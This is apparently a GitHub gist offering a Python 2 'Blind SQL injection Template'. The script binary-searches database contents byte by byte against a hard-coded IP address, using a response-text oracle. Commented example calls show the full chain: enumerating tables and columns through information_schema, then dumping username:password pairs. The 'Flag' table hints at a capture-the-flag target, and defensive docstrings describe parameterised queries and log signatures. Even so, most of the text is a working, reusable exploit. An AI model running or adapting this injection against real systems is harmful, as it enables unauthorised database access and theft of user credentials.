@abdilahrf
Last active December 8, 2020 00:39
Blind SQL injection Template
import requests
import re
# Hard-coded target endpoint and the form body that blind() POSTs to it.
# Only the "username" field is rewritten per request (it carries the probe);
# "password" is a fixed filler value and never changes.
url = "http://88.198.233.174:33534/index.php"
payload = {
    "username":"",
    "password":"x",
}
def check(data):
    """Return a match object if ``data`` contains ``Construction!``, else None.

    This is the true/false oracle that ``blind`` relies on: the page text
    differs depending on whether the injected condition held.  From the
    defender's side, serving the same page for both outcomes (and not
    echoing query errors or row-dependent content) removes the signal
    this function reads.
    """
    return re.search("Construction!", data)
def blind(kolom,table):
    """Recover the value of ``kolom`` from ``table`` one byte at a time.

    For each position ``idx`` a binary search over 1..255 is run: the
    injected username asks whether the byte at that position is
    ``<= mid`` and ``check`` reads the answer from the response body.
    The outer loop ends when the search converges on byte value 0
    (``hi == 0``), which this script treats as the end of the value.

    Args:
        kolom: column expression, interpolated verbatim into the query.
        table: table expression (may carry a WHERE clause), interpolated
            verbatim into the query.

    Returns:
        The recovered string; the partial result is also printed after
        every byte.

    Raises:
        ValueError: from ``chr(temp)`` when no probe in 1..255 matched,
            because ``temp`` is still -1 at that point.

    Note (defender's view): the whole technique depends on the server
    building SQL from the raw ``username`` field; a parameterised query
    removes the injection point.  The traffic is also distinctive: a
    burst of POSTs whose username contains ``ascii(substring(`` with a
    narrowing ``<=`` bound is a straightforward log signature.
    """
    passwd = ""
    idx = 1
    while (True):
        # Binary-search bounds for the current byte; temp holds the
        # smallest bound the oracle confirmed (-1 if none did).
        lo = 1
        hi = 255
        temp = -1
        while(lo <= hi):
            # Integer division: this file is Python 2 (print statement below).
            mid = (lo + hi) / 2
            payload['username'] = "' OR 1=1 and (select ascii(substring({},{},1)) from {}) <= {}#".format(str(kolom),str(idx),str(table),str(mid))
            # print payload
            res = requests.post(url,data=payload)
            if check(res.text):
                # Condition held: the byte is <= mid, search the lower half.
                hi = mid-1
                temp = mid
            else:
                lo = mid+1
        # Search converged on 0: no more bytes.
        if (hi == 0): break
        passwd += chr(temp)
        print "Result [{}]: {}".format(table,passwd)
        idx += 1
    return passwd
# get table name
# blind("group_concat(table_name)", "information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61")
# blind("group_concat(table_name)", "information_schema.tables order by table_schema desc")
# Result: users
#
# get column name
# username,password
# blind("group_concat(column_name)", "information_schema.columns where table_name='users'")
# blind("group_concat(column_name)", "information_schema.columns where table_name='Login'")
# blind("group_concat(column_name)", "information_schema.columns where table_name='Flag'")
# get data
# blind("group_concat(username,0x3a,password)", "users")
# blind("group_concat(username,password)", "Login")
# blind("group_concat(username,password)", "Flag")